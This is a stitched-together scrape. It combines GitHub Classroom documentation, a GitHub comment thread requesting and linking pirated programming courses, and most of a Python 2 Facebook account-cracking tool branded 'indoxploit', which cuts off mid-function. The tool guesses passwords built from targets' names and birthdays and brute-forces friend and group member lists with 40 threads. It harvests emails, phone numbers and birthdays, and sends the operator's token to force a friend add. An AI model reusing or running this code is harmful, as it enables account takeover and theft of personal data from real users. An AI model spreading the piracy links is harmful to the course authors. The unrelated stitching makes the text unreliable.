data variables.product.company_short %} accounts](/github/getting-started-with-github/types-of-github-accounts#organization-accounts)" and "[Creating a new organization from scratch](/github/setting-up-and-managing-organizations-and-teams/creating-a-new-organization-from-scratch)." You must authorize the OAuth app for {% data variables.product.prodname_classroom %} for your organization to manage classrooms for your organization account. For more information, see "[Authorizing OAuth Apps](/github/authenticating-to-github/authorizing-oauth-apps)." ### Creating a classroom {% data reusables.classroom.sign-into-github-classroom %} 1. Click **New classroom**.  {% data reusables.classroom.guide-create-new-classroom %} After you create a classroom, you can begin creating assignments for students. For more information, see "[Create an individual assignment](/education/manage-coursework-with-github-classroom/create-an-individual-assignment)" or "[Create a group assignment](/education/manage-coursework-with-github-classroom/create-a-group-assignment)." ### Creating a roster for your classroom You can create a roster of the students who participate in your course. If your course already has a roster, you can update the students on the roster or delete the roster. For more information, see "[Adding a student to the roster for your classroom](#adding-students-to-the-roster-for-your-classroom)" or "[Deleting a roster for a classroom](#deleting-a-roster-for-a-classroom)." {% data reusables.classroom.sign-into-github-classroom %} {% data reusables.classroom.click-classroom-in-list %} {% data reusables.classroom.click-students %} 1. To connect {% data variables.product.prodname_classroom %} to your LMS and import a roster, click {% octicon "mortar-board" aria-label="The mortar board icon" %} **Import from a learning management system** and follow the instructions. For more information, see "[Connect a learning management system to {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/connect-a-learning-management-system-to-github-classroom)."  1. To create a roster manually, type your student identifiers. Optionally, click **Upload a CSV or text file** to upload a file containing the identifiers.  1. Click **Create roster**.  ### Adding students to the roster for your classroom Your classroom must have an existing roster to add students to the roster. For more information about creating a roster, see "[Creating a roster for your classrom](#creating-a-roster-for-your-classroom)." {% data reusables.classroom.sign-into-github-classroom %} {% data reusables.classroom.click-classroom-in-list %} {% data reusables.classroom.click-students %} 1. To the right of "Classroom roster", click **Update students**.  1. Follow the instructions to add students to the roster. - To import students from an LMS, click **Sync from a learning management system**. For more information about importing a roster from an LMS, see "[Connect a learning management system to {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/connect-a-learning-management-system-to-github-classroom)." - To manually add students, under "Manually add students", click **Upload a CSV or text file** or type the identifiers for the students, then click **Add roster entries**.  ### Renaming a classroom {% data reusables.classroom.sign-into-github-classroom %} {% data reusables.classroom.click-classroom-in-list %} {% data reusables.classroom.click-settings %} 1. Under "Classroom name", type a new name for the classroom.  1. Click **Rename classroom**.  ### Archiving or unarchiving a classroom You can archive a classroom that you no longer use on {% data variables.product.prodname_classroom %}. When you archive a classroom, you can't create new assignments or edit existing assignments for the classroom. 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To the right of "Delete this classroom", click **Delete classroom**.  1. **Read the warnings**. 1. To verify that you're deleting the correct classroom, type the name of the classroom you want to delete.  1. Click **Delete classroom**.  22 ...on/manage-coursework-with-github-classroom/run-student-code-in-an-online-ide.md @@ -0,0 +1,22 @@ --- title: Run student code in an online IDE intro: You can run the code from a student assignment within the online integrated development environment (IDE) that you configured for the assignment. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/running-student-code --- ### About student code and online IDEs If you configure an online integrated development environment (IDE) for an assignment, you can run the code within the online IDE. You don't need to clone the assignment repository to your computer. For more information about online IDEs, see "[Integrate {% data variables.product.prodname_classroom %} with an online IDE](/education/manage-coursework-with-github-classroom/integrate-github-classroom-with-an-online-ide)." ### Running student code in the online IDE {% data reusables.classroom.sign-into-github-classroom %} {% data reusables.classroom.click-classroom-in-list %} {% data reusables.classroom.click-assignment-in-list %} 1. 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Has this come through by any chances? fff data-structures-algorithms-part-2 https://drive.google.com/open?id=1oYYdPp4MVVk7ZzZL6rLepFe33IjXtkqj Can you share part 1 and 3? https://vminhsang.name.vn/category/it-courses/codewithmosh/ this link includes almost all mosh courses @mohanrajrc mohanrajrc commented on 22 Jan Can you please add these two below ? https://codewithmosh.com/p/the-ultimate-java-mastery-series https://codewithmosh.com/p/data-structures-algorithms-part-2 any luck ? Has this come through by any chances? fff data-structures-algorithms-part-2 https://drive.google.com/open?id=1oYYdPp4MVVk7ZzZL6rLepFe33IjXtkqj Can you share part 1 and 3? https://vminhsang.name.vn/category/it-courses/codewithmosh/ this link includes almost all mosh courses Yes. Java mastery and Data Structures 1, 2, 3 are available in this site. free download. @shihab122 shihab122 commented on 22 Jan Please give me the torrnet file or link to download The Ultimate Design Patterns @EslamElmadny EslamElmadny commented on 22 Jan • Please give me the torrnet file or link to download The Ultimate Design Patterns Waiting for it also :D @K-wachira K-wachira commented on 23 Jan Can you please add these two below ? https://codewithmosh.com/p/the-ultimate-java-mastery-series https://codewithmosh.com/p/data-structures-algorithms-part-2 any luck ? Has this come through by any chances? fff data-structures-algorithms-part-2 https://drive.google.com/open?id=1oYYdPp4MVVk7ZzZL6rLepFe33IjXtkqj Can you share part 1 and 3? https://vminhsang.name.vn/category/it-courses/codewithmosh/ this link includes almost all mosh courses Yes. Java mastery and Data Structures 1, 2, 3 are available in this site. free download. You are a saviour .. Altho i feel bad i cant really buy the course... its really good @msdyn95 msdyn95 commented 25 days ago • Please give me the torrent file or link to download https://codewithmosh.com/p/design-patterns https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-1/ https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-2/ @K-wachira K-wachira commented 23 days ago This one kindly. https://www.udemy.com/course/flutter-build-a-complex-android-and-ios-apps-using-firestore/ Hey did you find this one? @edward-teixeira edward-teixeira commented 22 days ago Please give me the torrent file or link to download https://codewithmosh.com/p/design-patterns https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-1/ https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-2/ Did you find those? @msdyn95 msdyn95 commented 21 days ago Please give me the torrent file or link to download https://codewithmosh.com/p/design-patterns https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-1/ https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-2/ Did you find those? unfortunately not. @edward-teixeira edward-teixeira commented 20 days ago Please give me the torrent file or link to download https://codewithmosh.com/p/design-patterns https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-1/ https://coursedownloader.net/code-with-mosh-the-ultimate-design-patterns-part-2/ Did you find those? unfortunately not. Found it ! https://vminhsang.name.vn/category/it-courses/codewithmosh/ @ZainA14 ZainA14 commented 16 days ago • Can someone please link me to this mosh course for torrent or direct download link https://codewithmosh.com/p/the-ultimate-full-stack-net-developer-bundle @khushiigupta khushiigupta commented 9 days ago Can any one please provide me link for jenkins so that I can learn as al as possible to join this conversation on GitHub. Already have an account? Sign in to comment © 2020 GitHub, Inc. Terms Privacy Security Status Help Contact GitHub Pricing API Training Blog About
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U; id) Presto/2.12.423 Version/12.16')] def keluar(): print '\x1b[1;91m[!] Keluar' os.sys.exit() def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.1) logo = '\x1b[1;92m\n\xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97 \n \xe2\x95\x91\xe2\x95\x91\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4\xe2\x94\x9c\xe2\x94\xac\xe2\x94\x98\xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xa0\xe2\x95\xa3 \xe2\x95\xa0\xe2\x95\xa9\xe2\x95\x97\n\xe2\x95\x90\xe2\x95\xa9\xe2\x95\x9d\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\xb4 \xe2\x94\xb4 \xe2\x95\x9a \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \x1b[1;93mv1.7\n\x1b[1;93m* \x1b[1;97mAuthor \x1b[1;91m: \x1b[1;96mMr. Borot\x1b[1;97m\n\x1b[1;93m* \x1b[1;97mSupport \x1b[1;91m: \x1b[1;96mKunjungi\x1b[1;97m \x1b[1;96mwebsite \x1b[1;96mKami\n\x1b[1;93m* \x1b[1;97mwebsite \x1b[1;91m: \x1b[1;92m\x1b[4mhttp://indoxploit.id/\x1b[0m\n' def tik(): titik = [ '. ', '.. ', '... '] for o in titik: print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mSedang Masuk \x1b[1;97m' + o, sys.stdout.flush() time.sleep(1) back = 0 threads = [] berhasil = [] cekpoint = [] gagal = [] idteman = [] idfromteman = [] idmem = [] id = [] em = [] emfromteman = [] hp = [] hpfromteman = [] reaksi = [] reaksigrup = [] komen = [] komengrup = [] listgrup = [] vulnot = '\x1b[31mNot Vuln' vuln = '\x1b[32mVuln' def login(): os.system('reset') try: toket = open('login.txt', 'r') menu() except (KeyError, IOError): os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mLOGIN AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]' id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ') pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ') tik() try: br.open('https://m.facebook.com') except mechanize.URLError: print '\n\x1b[1;91m[!] Tidak ada koneksi' keluar() br._factory.is_html = True br.select_form(nr=0) br.form['email'] = id br.form['pass'] = pwd br.submit() url = br.geturl() if 'save-device' in url: try: sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32' data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'} x = hashlib.new('md5') x.update(sig) a = x.hexdigest() data.update({'sig': a}) url = 'https://api.facebook.com/restserver.php' r = requests.get(url, params=data) z = json.loads(r.text) zedd = open('login.txt', 'w') zedd.write(z['access_token']) zedd.close() print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin berhasil' requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token']) os.system('xdg-open http://indoxploit.id/') time.sleep(2) menu() except requests.exceptions.ConnectionError: print '\n\x1b[1;91m[!] Tidak ada koneksi' keluar() if 'checkpoint' in url: print '\n\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' os.system('rm -rf login.txt') time.sleep(1) keluar() else: print '\n\x1b[1;91m[!] Login Gagal' os.system('rm -rf login.txt') time.sleep(1) login() def menu(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: os.system('reset') print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: otw = requests.get('https://graph.facebook.com/me?access_token=' + toket) a = json.loads(otw.text) nama = a['name'] id = a['id'] except KeyError: os.system('reset') print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint' os.system('rm -rf login.txt') time.sleep(1) login() except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Tidak ada koneksi' keluar() os.system('reset') print logo print '\x1b[1;97m\xe2\x95\x94' + 40 * '\xe2\x95\x90' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Nama \x1b[1;91m: \x1b[1;92m' + nama print '\x1b[1;97m\xe2\x95\x9a' + 40 * '\xe2\x95\x90' print '\x1b[1;37;40m1. Informasi Pengguna' print '\x1b[1;37;40m2. Hack Akun Facebook' print '\x1b[1;37;40m3. Bot ' print '\x1b[1;37;40m4. Lainnya.... ' print '\x1b[1;37;40m5. LogOut ' print '\x1b[1;31;40m0. Keluar ' print pilih() def pilih(): zedd = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if zedd == '': print '\x1b[1;91m[!] Jangan kosong' pilih() else: if zedd == '1': informasi() else: if zedd == '2': menu_hack() else: if zedd == '3': menu_bot() else: if zedd == '4': lain() else: if zedd == '5': os.system('rm -rf login.txt') os.system('xdg-open http://indoxploit.id') keluar() else: if zedd == '0': keluar() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mTidak ada' pilih() def informasi(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID\x1b[1;97m/\x1b[1;92mNama\x1b[1;91m : \x1b[1;97m') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) cok = json.loads(r.text) for p in cok['data']: if id in p['name'] or id in p['id']: r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket) z = json.loads(r.text) print 40 * '\x1b[1;97m\xe2\x95\x90' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor HP\x1b[1;97m : ' + z['mobile_phone'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mNomor HP\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mTanggal Lahir\x1b[1;97m : ' + z['birthday'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mTanggal Lahir\x1b[1;97m : \x1b[1;91mTidak ada' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : ' for q in z['education']: try: print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name'] except KeyError: print '\x1b[1;91m ~ \x1b[1;91mTidak ada' except KeyError: pass raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() else: print '\x1b[1;91m[\xe2\x9c\x96] Pengguna tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() def menu_hack(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)' print '\x1b[1;37;40m2. Multi Bruteforce Facebook' print '\x1b[1;37;40m3. Super Multi Bruteforce Facebook' print '\x1b[1;37;40m4. BruteForce(\x1b[1;92mTarget\x1b[1;97m)' print '\x1b[1;37;40m5. Yahoo Checker' print '\x1b[1;37;40m6. Ambil id/email/hp' print '\x1b[1;31;40m0. Kembali' print hack_pilih() def hack_pilih(): hack = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if hack == '': print '\x1b[1;91m[!] Jangan kosong' hack_pilih() else: if hack == '1': mini() else: if hack == '2': crack() hasil() else: if hack == '3': super() else: if hack == '4': brute() else: if hack == '5': menu_yahoo() else: if hack == '6': grab() else: if hack == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mTidak ada' hack_pilih() def mini(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[ INFO ] Akun target harus berteman dengan akun anda dulu !' try: id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket) a = json.loads(r.text) print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] jalan('\x1b[1;91m[+] \x1b[1;92mMemeriksa \x1b[1;97m...') time.sleep(2) jalan('\x1b[1;91m[+] \x1b[1;92mMembuka keamanan \x1b[1;97m...') time.sleep(2) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' pz1 = a['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: pz2 = a['first_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: pz3 = a['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: lahir = a['birthday'] pz4 = lahir.replace('/', '') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: print '\x1b[1;91m[!] Maaf, gagal membuka password target :(' print '\x1b[1;91m[!] Cobalah dengan cara lain.' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() except KeyError: print '\x1b[1;91m[!] Terget tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() def crack(): global file global idlist global passw os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m') try: file = open(idlist, 'r') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') for x in range(40): zedd = threading.Thread(target=scrak, args=()) zedd.start() threads.append(zedd) for zedd in threads: zedd.join() except IOError: print '\x1b[1;91m[!] File tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() def scrak(): global back global berhasil global cekpoint global gagal global up try: buka = open(idlist, 'r') up = buka.read().split() while file: username = file.readline().strip() url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = urllib.urlopen(url) mpsh = json.load(data) if back == len(up): break if 'access_token' in mpsh: bisa = open('Berhasil.txt', 'w') bisa.write(username + ' | ' + passw + '\n') bisa.close() berhasil.append('\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: if 'www.facebook.com' in mpsh['error_msg']: cek = open('Cekpoint.txt', 'w') cek.write(username + ' | ' + passw + '\n') cek.close() cekpoint.append('\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: gagal.append(username) back += 1 sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint))) sys.stdout.flush() except IOError: print '\n\x1b[1;91m[!] Koneksi terganggu' time.sleep(1) except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' def hasil(): print print 40 * '\x1b[1;97m\xe2\x95\x90' for b in berhasil: print b for c in cekpoint: print c print print '\x1b[31m[x] Gagal \x1b[1;97m--> ' + str(len(gagal)) keluar() def super(): global toket os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Crack dari daftar Teman' print '\x1b[1;37;40m2. Crack dari member Grup' print '\x1b[1;31;40m0. Kembali' print pilih_super() def pilih_super(): peak = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if peak == '': print '\x1b[1;91m[!] Jangan kosong' pilih_super() else: if peak == '1': os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) for s in z['data']: id.append(s['id']) else: if peak == '2': os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') super() re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket) s = json.loads(re.text) for i in s['data']: id.append(i['id']) else: if peak == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada' pilih_super() print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id)) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') titik = ['. ', '.. ', '... '] for o in titik: print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o, sys.stdout.flush() time.sleep(1) print print 40 * '\x1b[1;97m\xe2\x95\x90' def main(arg): user = arg try: a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket) b = json.loads(a.text) pass1 = b['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1 else: if 'www.facebook.com' in q['error_msg']: print 